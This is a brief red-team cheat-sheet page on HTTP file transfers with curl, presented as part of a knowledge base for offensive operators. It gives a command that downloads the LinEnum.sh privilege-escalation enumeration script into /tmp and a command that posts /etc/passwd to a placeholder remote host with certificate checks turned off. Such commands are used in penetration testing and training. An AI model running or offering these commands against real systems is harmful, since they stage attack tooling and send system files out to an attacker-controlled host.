Operator On The Wire
Join
← Back to Knowledge Base
RED TEAM / FILE TRANSFERS / HTTP

curl

Download:


curl -o /tmp/LinEnum.sh https://LINK

Upload:


curl -X POST https://IP/upload -F 'files=@/etc/passwd' --insecure